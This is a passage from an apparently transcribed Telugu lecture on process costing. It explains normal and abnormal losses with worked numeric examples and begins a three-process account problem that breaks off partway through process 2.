కొనసాగుతున్న పని విలువని లెక్కించడం చాలా కష్టం. మనం ప్రాసెస్ కాస్టింగ్లోని ప్రాథమిక అంశాల గురించి చర్చించాం. ఇప్పుడు ప్రాసెస్ కాస్టింగ్లో వచ్చేటటువంటి నష్టాల గురించి
ఒకసారి చూద్దాం. ప్రాసెస్ కాస్టింగ్లో వివిధ ప్రక్రియల్లో వస్తూత్పత్తి జరుగుతున్నప్పుడు సాధారణంగా కొన్ని రకాలైనటువంటి నష్టాలు సంభవిస్తూ ఉంటాయి. ఈ నష్టాలు మనం 2 రకాలుగా వర్గీకరించడం జరిగింది. వస్తువులు వివిధ ప్రాసెస్లో తయారయ్యేటప్పుడు నష్టాలు సంభవించడం జరుగుతూ ఉంటుంది. ఈ నష్టాలు కాస్టింగ్ విభాగం వారు నమోదు చేసి నియంత్రించడానికి అవసరమైనటువంటి చర్యలు తీసుకోవాలి. దీంట్లో భాగంగా వివిధ ప్రాసెస్ల్లో ఏ రకమైనటువంటి నష్టాలు ఏర్పడ్డాయి అనేవి క్లియర్గా చూడడం జరుగుతుంటుంది. ఇలా ఏర్పడినటువంటి మొత్తం నష్టాలని సాధారణ నష్టాలు, అసాధారణ నష్టాలుగా విభజించడం జరుగుతుంది. ప్రాసెస్ల్లో వచ్చే మొత్తం నష్టాలని 2 రకాలుగా విభజిస్తారు. 1 సాధారణ నష్టం, 2 అసాధారణ నష్టం. ఇప్పుడు సాధారణ నష్టం అంటే ఏంటి చూద్దాం. సాధారణ నష్టం పేరులోనే మనకుంది. సర్వసాధారణంగా సరుకు యొక్క స్వభావ సిద్ధమైనటువంటి లక్షణాల వలన ఏర్పడినటువంటి నష్టమే సాధారణ నష్టం. ఇది సరుకు స్వభావం అంటే కొన్ని రకాల వస్తువులు ఆవిరయ్యేటటువంటి గుణం ఉంటుంది. కొన్ని రకాలైనటువంటి వస్తువులు రసాయనిక చర్యకు లోబడి సరుకు తాలూకా విలువ తగ్గడం జరుగుతుంది. అలాగే పరిశ్రమల్లో వస్తువులు శాంపిల్కై తీసేటప్పుడు ఆ విలువ కూడా తగ్గుతూ ఉంటుంది. ఇలాంటి కారణాల వల్ల సరుకులో సంభవించేటటువంటి నష్టాల్ని మనం సాధారణ నష్టాలుగా చెప్పవచ్చు. సాధారణ నష్టం అనగానే సరుకు యొక్క సహజ సిద్ధమైనటువంటి స్వాభావికమైనటువంటి లక్షణాల వలన ఏర్పడినటువంటి నష్టమే సాధారణ నష్టంగా మనం భావించవచ్చు. అలా కాకుండా ఇతరత్ర కారణాలు అంటే అజాగ్రత్తల వలన కానీ లేదా యాజమాన్య లోపాల వలన కానీ జరిగేటటువంటి లోపాల వలన వచ్చే నష్టం అసాధారణ నష్టం అంటారు. అది మనం తర్వాత చూద్దాం. ప్రస్తుతం సాధారణ నష్టం వచ్చినప్పుడు ఏ విధంగా లెక్కించాలి, సాధారణ నష్టాన్ని ఎవరు భరించాలి అనేటటువంటి అంశం చూసినట్లయితే ఇప్పుడే మనం అనుకున్నాం. సాధారణ నష్టం అనేది సరుకు యొక్క సహజ స్వభావ సిద్ధంగా కారణాల వలన ఏర్పడినటువంటి నష్టం. ఈ నష్టాన్ని ఏ విధంగా లెక్కించాలి? ఈ నష్టం యొక్క భారము వినియోగదారుల మీదే పడుతుంది. ఎందుకంటే సాధారణ నష్టము వలన ఉత్పత్తి వ్యయము పెరిగి యూనిట్ వ్యయం కూడా పెరిగి తదుపరి వస్తు ధర పెరిగి వినియోగదారుడు ఆ భారాన్ని భరించవలసినటువంటి అవసరం ఉంటుంది. ఇక్కడ ఒకసారి గమనించినట్లయితే సాధారణ నష్టాన్ని ఏ ప్రాసెస్లో వచ్చిందో గమనించి ఆ ప్రాసెస్ ఉత్పత్తిలో వ్యయంగా భావించి దానికి మనకి చూపించడం జరుగుతూ ఉంటుంది. సాధారణ నష్టం ముందుగా ఏ ప్రాసెస్లో ఏర్పడిందో గమనించి ఆ ప్రాసెస్లో అయినటువంటి ఉత్పత్తి వ్యయంలో భాగంగా సాధారణ నష్టాన్ని పరిగణించడం జరుగుతుంది. ఎప్పుడైతే సాధారణ నష్టాన్ని ఉత్పత్తి వ్యయంలో భాగంగా పరిగణించామో ఉత్పత్తి వ్యయం పెరుగుతుంది, తద్వారా యూనిట్ వ్యయం పెరుగుతుంది. యూనిట్ వ్యయం పెరిగింది అంటే ఆ వ్యయం యొక్క భారము వినియోగదారుడు భరించవలసినటువంటి అవసరం ఉంటుంది. ఇక్కడ మన సాధారణ నష్టం లెక్కింపు ఒక ఉదాహరణ ద్వారా చూద్దాం. ఒక సంస్థలో 1000 యూనిట్లు తయారయ్యి అనుకున్నాం అనుకోండి. ఒక్కొక్క యూనిట్ తయారీకి 10 రూపాయలు ఖర్చు అయింది. ఈ సందర్భంలో 1000 యూనిట్లకి ఒక్కొక్క యూనిట్కి 10 రూపాయలు అయితే మొత్తం ఉత్పత్తి వ్యయం 10,000 రూపాయలు. ఇక్కడ సాధారణ నష్టం 10 యూనిట్లు ఏర్పడింది అనుకున్నట్లయితే ఈ సాధారణ నష్టాన్ని ఏ విధంగా భావిస్తారు అంటే ముందుగా 1000 యూనిట్లు కదా ఉత్పత్తి అయ్యాయి. ఈ 1000 యూనిట్లలోంచి 10 యూనిట్లు ఏర్పడినటువంటి సాధారణ నష్టాన్ని మినహాయిస్తారు. అంటే ఇప్పుడు మన దగ్గర ఉన్నటువంటి యూనిట్లు 990 యూనిట్లు మాత్రమే. ఉత్పత్తి వ్యయం 10,000 రూపాయలు తీసుకోవడం జరుగుతుంది. అంటే ఇక్కడ మీరు గమనించవలసింది సాధారణ నష్టం ఏర్పడక ముందు 1000 యూనిట్లు 10,000 రూపాయలు అయితే సాధారణ నష్టం ఏర్పడిన తర్వాత 990 యూనిట్లు 10,000 రూపాయలుగా మారడం జరిగింది. అంటే ఇక్కడ ఏం జరిగింది? ఉత్పత్తి వ్యయము ఏదైతే 10 యూనిట్లకి అయిందో అది ఉత్పత్తి వ్యయంలో భాగంగా చూపించడం వలన ఒక వస్తువు 10 రూపాయలకు రావాల్సినటువంటి వస్తువు సాధారణ నష్టం ఏర్పడడం వల్ల ఇక్కడ మనకి 10 రూపాయలు 10 పైసలుగా అవుతుంది. ఎందుకంటే మొత్తం ఉత్పత్తి వ్యయం 10,000 రూపాయలుగా భావిస్తే ఉత్పత్తి అయిన యూనిట్లు సాధారణ నష్టం మినహా
990 యూనిట్లు ఉంది. 10,000/990 కానీ చేసినట్లయితే యూనిట్ వ్యయము ₹10.10 అయినది. అంటే సాధారణ నష్టం ఏర్పడడం వల్ల ₹10 రావాల్సినటువంటి వస్తువు ₹10.10 నిర్ణయం అవుతుంది. కాబట్టి దీని యొక్క భారము వినియోగదారుడి మీదే పడుతుంది. సాధారణ నష్ట భారం వినియోగదారుడి మీద పడుతుంది. సో సాధారణ నష్టం వల్ల ఉత్పత్తి వ్యయం పెరిగి ఈ రకమైనటువంటి యూనిట్ ధర పెరిగి ఈ భారాన్ని వినియోగదారుడు తీసుకోవాల్సినటువంటి అవసరం ఉంది. అలాగే ఇందాక చర్చించినట్లు ప్రాసెస్ ఖాతాలో వచ్చేటటువంటి నష్టాలని సాధారణంగా 2 రకాల నష్టాలుగా మనం వర్గీకరిస్తాం. మొట్టమొదటిది సాధారణ నష్టం, రెండవది అసాధారణ నష్టం. సాధారణ నష్టం గురించి ఆల్రెడీ చర్చించాం. సహజ సిద్ధమైన సరుకు యొక్క స్వాభావిక కారణాల వలన ఏర్పడిన నష్టం సాధారణ నష్టం అనుకున్నాం. సాధారణ నష్టం వల్ల ఏర్పడిన నష్టాన్ని ఉత్పత్తి వ్యయం పెంచి తద్వారా వినియోగదారుల మించి స్వీకరించడం జరుగుతుంటుంది. ఇప్పుడు అసాధారణ నష్టం అంటే ఏంటి? అసాధారణ నష్టం వల్ల ఉత్పత్తిపై ఏమైనా ప్రభావం ఉంటుందా? ఈ అసాధారణ నష్టాన్ని ఎవరు భరించాలి అనేటటువంటి అంశం ఇప్పుడు ఒకసారి మనం చర్చిద్దాం. పేరులోనే ఉంది అసాధారణ నష్టం. అసాధారణ నష్టం అంటే అసాధారణ కారణాల వలన ఏర్పడినటువంటి నష్టం. ఈ నష్టం ఏ కారణాలు ఒకసారి ఉదాహరణ చూస్తే, నాసిరకమైనటువంటి ముడి పదార్థాలు వాడడం వల్ల, యాజమాన్యం యొక్క అసమర్థత వలన, అగ్ని ప్రమాదాల వలన, ఇటువంటి అసాధారణ పరిస్థితుల వలన, లేదైనా అజాగ్రత్తల వలన, లేదా యంత్రాలు పాడైపోవడం లేదా చెడిపోవడం, ఇటువంటి కారణాల వలన ఉత్పత్తి ఆగిపోయి తద్వారా వచ్చినటువంటి నష్టాన్ని అసాధారణ నష్టంగా పరిగణించడం జరుగుతుంది. ఈ అసాధారణ నష్టాన్ని సరైన జాగ్రత్తలు కానీ మనం తీసుకున్నట్లయితే ఇవి ఏర్పడకుండా చేయగలిగేటటువంటి అవకాశం ఉంది. కాబట్టి ఈ అసాధారణ నష్టం జాగ్రత్తలు తీసుకోకపోవడం వలన ఏర్పడినటువంటి నష్టాలు. కాబట్టి ఈ అసాధారణ నష్టం ఏ సంస్థలో అయితే ఏర్పడ్డాయో ఆ సంస్థ మాత్రమే భరించవలసినటువంటి అవసరం ఉంది. ఈ అసాధారణ నష్టాన్ని ఏ విధంగా లెక్కిస్తారు అని కానీ ఒక ఉదాహరణ ద్వారా కానీ మనం చూసినట్లయితే, అసాధారణ నష్టం లెక్కింపు. అసాధారణ నష్టం ఉత్పత్తి వ్యయాన్ని ప్రభావితం చేయరాదు. ఎందుకంటే సాధారణ నష్టం అయితే సహజసిద్ధమైన లక్షణాల వల్ల ఏర్పడింది కాబట్టి ఆ నష్టం భర్తీ చేయాలి అంటే వినియోగదారుల నుంచి ఉత్పత్తి వ్యయం రూపంలో తీసుకోవడం, ధర రూపంలో తీసుకోవడం జరుగుతుంది. కానీ అసాధారణ నష్టం అసాధారణ కారణాల వల్ల, అజాగ్రత్తల వలన ఏర్పడినటువంటి నష్టం. ఈ నష్టం యొక్క భారం వినియోగదారుల మీద వేయడానికి ఎంత మాత్రమూ సమంజసం కాదు. కాబట్టి ఈ అసాధారణ నష్టాన్ని ఎంతైందో లెక్కించి ఉత్పత్తి వ్యయాన్ని ప్రభావితం చేయకుండా యూనిట్ ధరను నిర్ణయించవలసినటువంటి అవసరం ఉంది. సో ఈ అసాధారణ నష్టాన్ని లెక్కించడానికి ఇక్కడ ఒక ఫార్ములా ఇచ్చాం. ఒకసారి ఆ ఫార్ములా కానీ చూసినట్లయితే, అసాధారణ నష్టము ఈజ్ ఈక్వల్ టు ప్రాసెస్ ఉత్పత్తి వ్యయము మైనస్ సాధారణ నష్టం విలువ డివైడెడ్ బై ప్రవేశపెట్టిన యూనిట్లు మైనస్ సాధారణ నష్టం యూనిట్లు ఇంటూ అసాధారణ నష్టం యూనిట్లు. ఈ సూత్రం కానీ మీరు ఫాలో అయినట్లయితే అసాధారణ నష్టం లెక్కించవచ్చు. ఉదాహరణకి ఒక సంస్థలో 10,000 యూనిట్లు తయారయ్యే అనుకుందాం. 10,000 యూనిట్లు తయారవడం వలన అందులో 10 యూనిట్లు సాధారణ నష్టం అనుకోండి. మిగతా ప్రాసెస్లో ఇంకొక 10 యూనిట్లు అసాధారణ నష్టం ఏర్పడింది అనుకుందాం. ఇప్పుడు అసాధారణ నష్టం ఏ విధంగా లెక్కించాలి అంటే, ముందు ప్రాసెస్కి అయినటువంటి మొత్తం ఉత్పత్తి వ్యయం ఎంత లెక్కించి ఆ ఉత్పత్తి వ్యయంలో సాధారణ నష్టంకి ఏదైనా రద్దు విలువ కానీ ఉన్నట్లయితే సాధారణ నష్టం విలువ తీసేయాలి. తీసేస్తే మనకి ఉత్పత్తి వ్యయం వస్తుంది. ఎప్పుడైతే ఈ ఉత్పత్తి వ్యయం వచ్చిందో, ఎన్ని యూనిట్లు ఉత్పత్తి చేశామో అందులోంచి సాధారణ నష్టం యూనిట్లు తీసేసి మిగిలిన యూనిట్లు ఎన్నైతే ఉన్నాయో అన్ని యూనిట్లు తీసుకోవడం జరుగుతుంది. ఇంటూ అసాధారణ నష్టం ఎన్ని యూనిట్లు అయితే అయ్యిందో అసాధారణ నష్టం 10 యూనిట్లు అయితే 10 యూనిట్లు కానీ వేసినట్లయితే అసాధారణ నష్టం విలువ వస్తుంది. ఈ విషయం మనం ఒక ఉదాహరణ ద్వారా చూసినట్లయితే మీకు క్లియర్గా అర్థమవుతుంది. ఇక్కడ చూడండి, ఒక సంస్థలో 1000 యూనిట్లు తయారయ్యి అనుకుందాం. తయారైన తర్వాత ఈ 1000 యూనిట్లు తయారవడానికి యూనిట్కి ₹10 వ్యయం అయింది. అయితే ఇప్పుడు మొత్తం ఉత్పత్తి వ్యయం ఎంత అవుతుంది? 1000 యూనిట్లు ఇంటూ ₹10 ఉత్పత్తి వ్యయం
10,000 రూపాయలు మొత్తం ఉత్పత్తి వ్యయం అయింది. ఇక్కడ అసాధారణ నష్టం ఒకటి జరిగింది అనుకోండి, 10 యూనిట్ల అసాధారణ నష్టం జరిగింది. ఇక్కడ అసాధారణ నష్టం విలువ ఏ విధంగా లెక్కించాలి? ఇక్కడ మొత్తం ఉత్పత్తి వ్యయము 1000 యూనిట్లకి 10,000 అయింది, అసాధారణ నష్టం 10 యూనిట్లు అయింది. అంటే ఇక్కడ అసాధారణ నష్టం కాబట్టి ఉత్పత్తి వ్యయాన్ని ఎట్టి పరిస్థితుల్లో కూడా ఈ అసాధారణ నష్టం యూనిట్ల వల్ల పెంచడానికి వీల్లేదు. కాబట్టి ఇక్కడ ఏం చేస్తారు అంటే, ఇక్కడ ఉత్పత్తి వ్యయాన్ని 990 యూనిట్లకు 9,900 రూపాయలుగా పరిగణించడం జరుగుతుంది. అంటే ఇప్పుడు మీకు ఈ ఉదాహరణ చూస్తే యూనిట్ వ్యయము 9,900 రూపాయల ఉత్పత్తి వ్యయము, 990 యూనిట్లు ఉత్పత్తికి 10 రూపాయలు అయింది. అంటే ఇక్కడ గమనించవలసిన అంశం, ఒకసారి వెనక్కి కానీ వెళ్ళినట్లయితే, అసాధారణ నష్టం ఏర్పడకముందు ఒక యూనిట్ యొక్క వ్యయము 10 రూపాయలు ఉంది. అదే అసాధారణ నష్టం ఏర్పడిన తర్వాత కూడా యూనిట్ వ్యయము 10 రూపాయలు ఉంది. అంటే దీన్ని బట్టి మనం అర్థం చేసుకోవాల్సినటువంటి అంశం ఏంటి అంటే, అసాధారణ నష్టం యొక్క భారము వినియోగదారుడిపై పడదు. ఎందువలనంటే అసాధారణ నష్టం సంస్థ భరిస్తుంది. అందువలన ఉత్పత్తి వ్యయము పెరగదు, యూనిట్ ధర పెరగదు. ఇక్కడ మీరు క్లియర్గా సాధారణ నష్టం లెక్కింపు, అసాధారణ నష్టం లెక్కింపు ఈ రెండిట్ల మధ్య వ్యత్యాసం తెలుసుకోవాలి. ఇక్కడ నేను ఇచ్చిన ఉదాహరణలో ఓన్లీ సాధారణ నష్టం ఏర్పడితే ఏం చేయాలి, ఓన్లీ అసాధారణ నష్టం ఏర్పడితే ఏం చేయాలి చెప్పాను. ప్రాక్టికల్గా వచ్చేటప్పటికి 2 నష్టాలు కూడా ఏర్పడేటటువంటి అవకాశం ఉంది. సాధారణ నష్టం ఏర్పడవచ్చు, అసాధారణ నష్టం ఏర్పడవచ్చు. ఈ సందర్భంలో ఏం చేయాలి? ముందుగా సాధారణ నష్టం విలువని యూనిట్లలోంచి తీసి, ఎన్ని యూనిట్లు అయితే నష్టం జరిగింది యూనిట్లోంచి మినహాయించి అక్కడ దాకా అయినటువంటి ఉత్పత్తి వ్యయాన్ని లెక్కించాలి. తదుపరి అసాధారణ నష్టం విలువ మనం లెక్కించవలసినటువంటి అవసరం ఉంది. ఒకసారి విద్యార్థులు గమనించినట్లయితే ఈ భాగంలో మనం ఏం నేర్చుకున్నామంటే, ప్రాసెస్ నిరంతర ప్రక్రియ జరుగుతున్నప్పుడు ఇటువంటి ప్రాసెస్ల్లో నష్టాలు సంభవిస్తూ ఉంటాయి. ఈ నష్టాలని మనం 2 రకాలుగా మనం వర్గీకరించడం జరిగింది. ఒకటి సాధారణ నష్టం, 2 అసాధారణ నష్టం. సాధారణ నష్టం స్వభావ సిద్ధమైనటువంటి కారణాల వలన ఏర్పడేటటువంటి నష్టం. సరుకు ఆవిరైపోవడం కానీ, సరుకులో ఉండేటటువంటి సహజ లక్షణం అనేటువంటి రసాయనిక చర్యల వల్ల కానీ, శాంపిల్స్ వల్ల కానీ అయినటువంటి నష్టం సాధారణ నష్టంగా పరిగణించాలి. అలాగే అసాధారణ నష్టం అసాధారణ కార్యాల వల్ల, అంటే యంత్రాలు చెడిపోవడం, సరైనటువంటి ముడి పదార్థాలు వాడకపోవడం, వీటి వల్ల వచ్చేటటువంటి నష్టం. సాధారణ నష్టం వల్ల ఏర్పడినటువంటి నష్టం, దీని యొక్క భారం వినియోగదారులపై పడుతుంది. అసాధారణ నష్టం వల్ల వచ్చినటువంటి ఏదైతే ఉందో ఆ భారం సంస్థ మాత్రమే భరిస్తుంది. సాధారణ నష్టం వల్ల ఉత్పత్తి వ్యయము పెరుగుతుంది, అసాధారణ నష్టం వల్ల ఉత్పత్తి వ్యయంపై ఎటువంటి ప్రభావము ఉండదు. ఇది ఈ సెషన్లో మనం నేర్చుకున్నది. ప్రాక్టికల్స్ ప్రాబ్లమ్స్ నెక్స్ట్ సెషన్లో మనం నేర్చుకుంటాం. ఇప్పుడు 3వ భాగం ప్రాసెస్ కాస్టింగ్ ప్రాక్టికల్ ప్రాబ్లమ్స్ సింపుల్ ఉదాహరణలతో మనం చూద్దాం. ఇప్పుడు దాకా మనం ప్రాసెస్ కాస్టింగ్లో ప్రాథమిక అంశాల గురించి తెలుసుకున్నాం, ప్రాసెస్ కాస్టింగ్లో వచ్చేటటువంటి నష్టాల గురించి తెలుసుకున్నాం. వీటి ఆధారంగా మనం ప్రాసెస్ ఖాతా ఎలా వేయాలి, ఏ విధంగా వేయాలి అన్నది మనం ఒక ప్రాక్టికల్ ఉదాహరణలతో మనం చూద్దాం. ఇక్కడ
మీరు కానీ ఈ ప్రశ్న కానీ చూసినట్లయితే, ఒక వస్తువు తయారీకి 3 ప్రాసెస్ల ద్వారా జరుగుతుంది. వేతనాల నిష్పత్తిలో పరోక్ష ఖర్చులను 8,500 రూపాయలను విభజించవలెను. నెల ప్రారంభంలో కానీ చివరకు కానీ సరుకు నిల్వ, కొనసాగుతున్న పని నిల్వ ఏమీ లేదు. క్రింది సమాచారంతో ఒక్కొక్క ప్రాసెస్ యొక్క ధరను 2019 ఆగస్టుకు సంబంధించినవి లెక్కగట్టుము. ఈ ప్రశ్నలో మీరు కానీ గమనించినట్లయితే, ఒక వస్తువు తయారీకి 3 ప్రాసెస్లు ఉన్నాయని మీకు అర్థమవుతుంది. అలాగే ఉమ్మడి ఖర్చులు ఒక 8,500 రూపాయలు ఇవ్వడం జరిగింది. ఈ ఉమ్మడి ఖర్చుల్ని ఏ ప్రాతిపదిక మీద పంచాలి అనేది కూడా చెప్పడం జరిగింది. ప్రతి ప్రాసెస్లో ఉండేటటువంటి వేతనాల నిష్పత్తిలో ఈ ఉమ్మడి పరోక్ష ఖర్చులు 8,500ని విభజించాలి అని చెప్పారు. ఈ సమాచారంతో పాటు అదనపు సమాచారం కూడా ఇచ్చారు. దాని ఆధారంగా ప్రాసెస్ ఖాతాని ఏ విధంగా తయారు చేయాలి మనం చూద్దాం. ప్రాసెస్ ఖాతాను తయారు చేయడానికి ముందుగా ప్రాసెస్ ఖాతా నమూనా ఏ విధంగా ఉంటుంది? సాధారణమైనటువంటి ఖాతాలాగే ప్రాసెస్ ఖాతా కూడా డెబిట్, క్రెడిట్ ఉండడం జరుగుతూ ఉంటుంది. డెబిట్లో ఏ అంశాలు వస్తాయి ప్రాసెస్ ఖాతాలో అని కానీ చూసినట్లయితే, ముందుగా ఏ ప్రాసెస్ ఖాతా మనం తయారు చేస్తున్నామో ఆ ప్రాసెస్ ఖాతాలో మెటీరియల్, ప్రవేశపెట్టబడినటువంటి మెటీరియల్ని ప్రాసెస్ ఖాతాలో డెబిట్ వైపు రాయవలసినటువంటి అవసరం ఉంది. ప్రాసెస్ ఖాతాలో డెబిట్ వైపు రాసే అంశాలన్నీ కూడా ఉత్పత్తి వ్యయాన్ని పెంచేటటువంటి అంశాలు ఉంటాయి. ప్రాసెస్ ఖాతాలో డెబిట్ వైపు ముందుగా మెటీరియల్స్ రాసిన తర్వాత వేతనాలు, ప్రత్యక్ష ఖర్చులు, పరోక్ష ఖర్చులు, ఇలా ఒక్కొక్క అంశాన్ని ప్రాసెస్ ఖాతాలో డెబిట్ వైపు రాయవలసి ఉంటుంది. అదే క్రెడిట్ వైపు ఏవైనా సాధారణ నష్టం ఏర్పడినా, అసాధారణ నష్టం ఏర్పడినా ఈ తదుపరి ప్రాసెస్కి మొత్తం ఉత్పత్తి వ్యయాన్ని బదిలీ చేసేటప్పుడు క్రెడిట్ వైపు రాయడం జరుగుతుంది. మరొకసారి జాగ్రత్తగా వినండి. ప్రాసెస్ ఖాతాను తయారు చేసేటప్పుడు ప్రాసెస్ ఖాతా నమూనా ఏ విధంగా ఉంటుంది అంటే, ప్రాసెస్ ఖాతాలో డెబిట్ వైపు వేయవలసినటువంటి అంశాలు ముందుగా ఆ ప్రాసెస్లో ప్రవేశపెట్టినటువంటి మెటీరియల్స్, ఆ ప్రాసెస్ సంబంధించినటువంటి ప్రత్యక్ష వేతనాలు, ఆ ప్రాసెస్ సంబంధించినటువంటి పరోక్ష ఖర్చులు డెబిట్లో వేయవలసినటువంటి అవసరం ఉంటుంది. క్రెడిట్కి వచ్చేటప్పటికి ఆ ప్రాసెస్లో సంబంధించినటువంటి సాధారణ నష్టం, అదే ప్రాసెస్లో సంబంధించినటువంటి అసాధారణ నష్టం, ఇంకా తదుపరి మొత్తం ఉత్పత్తి వ్యయాన్ని తదుపరి ప్రాసెస్కి బదిలీ చేయడం అనేది ఉంటుంది. ఇక్కడ మీకు నమూనా పూర్తిగా అర్థమైతే లెక్కని ఇమీడియట్గా చేసేటటువంటి అవకాశం ఉంటుంది. ఒకసారి లెక్క చెప్తున్నాను. ఈ లెక్క ఒకసారి జాగ్రత్తగా చూసినట్లయితే, ఇక్కడ వస్తు తయారీకి 3 ప్రాసెస్లు ఉన్నాయని చెప్పారు. ఇక్కడ ఉమ్మడిగా అయినటువంటి ఖర్చులు 8,500 రూపాయలు ఉన్నాయని చెప్పారు. ఈ 8,500ని ప్రతి ఒక్క ప్రాసెస్లో ఉండేటటువంటి వేతనాల నిష్పత్తులు పంచమని చెప్పారు. ఇంకా మిగతా వివరాలు ఈ విధంగా ఇవ్వడం జరిగింది. ఇక్కడ వివరాలు కానీ మీరు కానీ అబ్జర్వ్ చేసినట్లయితే, ప్రాసెస్ 1, ప్రాసెస్ 2, ప్రాసెస్ 3 ఇచ్చినటువంటి వివరాలు చూడండి. మెటీరియల్స్, వేతనాలు, ప్రత్యక్ష ఖర్చులు. మెటీరియల్స్ ప్రాసెస్ 1లో 15,000, వేతనాలు 8,000, ప్రత్యక్ష ఖర్చులు ప్రాసెస్ 1లో 2,600 ఇవ్వడం జరిగింది. అదేవిధంగా ప్రాసెస్ 2లో మెటీరియల్స్ 5,000, వేతనాలు 20,000, ప్రత్యక్ష ఖర్చులు 7,200 ఇవ్వడం జరిగింది. ప్రాసెస్ 3లో 2,000 మెటీరియల్స్, 6,000 వేతనాలు, ప్రత్యక్ష ఖర్చులు 2,500 ఇవ్వడం జరిగింది. ఈ లెక్కని మన ప్రాసెస్ ఖాతాలో ఏ విధంగా చూపించాలి, ఏ విధంగా ఉత్పత్తి వ్యయాన్ని మనం లెక్కించాలి అన్నది చూద్దాం. ముందుగా ప్రాసెస్ 1. ప్రాసెస్ 1 పూర్తయిన తర్వాత మాత్రమే ప్రాసెస్ 2కి వెళ్ళాలి. ప్రాసెస్ 2 పూర్తయిన తర్వాత ప్రాసెస్ 3కి వెళ్ళాలి. మనం ప్రాథమిక అంశాల్లో చెప్పుకున్నాం, ప్రాసెస్ కాస్టింగ్ అనేది ఒక అవిచ్ఛిన్న ప్రక్రియ. ఎందుకంటే ప్రాసెస్ 1 పూర్తయిన తర్వాత ప్రాసెస్ 1లో తయారైన వస్తువు ప్రాసెస్ 2కి బదిలీ చేయడం జరుగుతుంది. ప్రాసెస్ 2లో తయారైన వస్తువు ప్రాసెస్ 3కి బదిలీ చేయడం జరుగుతుంది. ప్రాసెస్ 3లో పూర్తయినటువంటి వస్తువుల్ని పూర్తిగా తయారైన వస్తువులకి బదిలీ చేయడం జరుగుతుంది. ఇప్పుడు ఈ లెక్కను ఏ విధంగా చేయాలో ఒక్కసారి చూడండి. ప్రాసెస్ ఖాతా 1 నేను చెప్పినట్టుగా నమూనా మీరు కానీ గుర్తుంచుకున్నట్లయితే, ప్రాసెస్ ఖాతాలో డెబిట్ వైపు ముందుగా మనం వేయవలసినటువంటి అంశం మెటీరియల్స్. ఇక్కడ ప్రాసెస్ 1కి సంబంధించిన మెటీరియల్స్ ఎంత ఇచ్చారు? 15,000 ఇవ్వడం జరిగింది. అలాగే వేతనాలు ఎంత ఇచ్చారు? 8,000 ఇవ్వడం జరిగింది. ప్రత్యక్ష ఖర్చులు 2,600 ఇవ్వడం జరిగింది. ఇవి ప్రాసెస్ ఖాతాలో ముందుగా డెబిట్ వైపు రాయాలి. మెటీరియల్స్ 15,000 డెబిట్ చేసాం, 2 మెటీరియల్స్. అలాగే వేతనాలు డెబిట్ చేసాం 8,000, ప్రత్యక్ష ఖర్చులు డెబిట్ చేసాం 2,600.
మీకు లెక్క చెప్పినప్పుడు ప్రారంభంలోనే చెప్పాను, ప్రత్యక్ష ఖర్చులు అయిపోయిన తర్వాత ఒక ఉమ్మడి పరోక్ష ఖర్చులు ఉన్నాయి 8,500. ఈ ఉమ్మడి పరోక్ష ఖర్చుల్ని మీరు ఏ విధంగా పంచాలి అనేది ప్రాతిపదిక ఇవ్వడం జరిగింది. ప్రత్యక్ష వేతనాల ప్రాతిపదికలో పంచాలి అని చెప్పడం జరిగింది. ఇక్కడ కానీ మీరు ప్రత్యక్ష వేతనాలు కానీ చూసినట్లయితే ప్రశ్నలో ప్రాసెస్ 1కి 8,000, అలాగే ప్రాసెస్ 2కి 20,000, ప్రాసెస్ 3కి 6,000 ఇవ్వడం జరిగింది. ఈ వేతనాలకు కానీ మనం కానీ నిష్పత్తి కానీ కట్టినట్లయితే నిష్పత్తి ఏ విధంగా వస్తుంది అంటే 4:10:3గా రావడం జరుగుతుంది. ఈ నిష్పత్తి ప్రకారం ప్రాసెస్ 1కి 8,500 ఉమ్మడి పరోక్ష ఖర్చులను పంపిణీ చేసినట్లయితే 4/17 చేస్తే మనకు వచ్చేటటువంటి ఖర్చులు ప్రాసెస్ 1కి డెబిట్ చేయవలసినవి 2,000 రూపాయలు. సో ఈ మొత్తం ఖర్చులు డెబిట్ టోటల్ చేస్తే 27,600 రూపాయలు వచ్చింది. ఈ 27,600ని తదుపరి ప్రాసెస్కి బదిలీ చేయాలి. కాబట్టి తదుపరి ప్రాసెస్ బదిలీ చేయాలంటే ప్రాసెస్ 1లో క్రెడిట్ చేయాలి బై ప్రాసెస్ 2 ఖాతా అని చెప్పి 27,600. ఈ ప్రశ్నలో ప్రాథమిక ప్రశ్న కాబట్టి మీకు సాధారణ నష్టం కానీ అసాధారణ నష్టం కానీ ఏమీ ఇవ్వలేదు. సాధారణ పరిస్థితుల్లో ఈ విధంగా మీరు ప్రాసెస్ ఖాతాని తయారు చేయాలి. ఇదే విధంగా ప్రాసెస్ 2ని తయారు చేయాలి, ప్రాసెస్ 3ని కూడా తయారు చేయాలి. ఇప్పుడు ప్రాసెస్ 2 చూద్దాం. ప్రాసెస్ 2 తయారు చేసేటప్పుడు ముందుగా ప్రాసెస్ 1లో బదిలీ చేసింది ప్రాసెస్ 2కి బదిలీ అవుతుంది కాబట్టి ప్రాసెస్ 2లో ఫస్ట్ రాయవలసినటువంటిది ప్రాసెస్ 1 నుంచి బదిలీ అయింది రాయాలి. కాబట్టి ప్రాసెస్ 1 ఖాతా అని రాయాలి. ప్రాసెస్ 1లో వెనక్కి చూసినట్లయితే ఎంత బదిలీ చేశాము? 27,600 బదిలీ చేశాం. ఈ బదిలీ అయిన అంశము ముందుగా ప్రాసెస్ 2 ఖాతాలో డెబిట్ వైపున రాయవలసి ఉంటుంది. ఇంక తదుపరి ప్రక్రియ ఈ ప్రాసెస్ 2కి సంబంధించి ప్రశ్నలో మెటీరియల్స్ ఎంత ఇచ్చారు, వేతనాలు ఎంత ఇచ్చారు, ప్రత్యక్ష ఖర్చులు ఎంత ఇచ్చారో చూసి మెటీరియల్స్, వేతనాలు, ప్రత్యక్ష ఖర్చులు ప్రాసెస్ 2 ఖాతాలో డెబిట్ చేయవలసినటువంటి అవసరం ఉంది. మీరు ఒకసారి ప్రశ్నలు కానీ వెనక్కి కానీ చూసినట్లయితే ప్రాసెస్ 2కి సంబంధించి మెటీరియల్ 5,000, వేతనాలు 20,000, ప్రత్యక్ష ఖర్చులు 7,200 ఇవ్వడం జరిగింది. ఇవి ప్రాసెస్ 2 ఖాతాలో డెబిట్ వైపున వేతనాలు, ప్రత్యక్ష ఖర్చులు రాయడం జరిగింది. ఇక్కడ కూడా ఉమ్మడి ఖర్చుల్ని పంపిణీ చేయాలి. ఉమ్మడి ఖర్చుల్ని ఏ ప్రాతిపదిక మీద పంపిణీ చేయాలి అనేది గతంలో మనం చూసాము. ఇక్కడ ప్రత్యక్ష వేతనాల 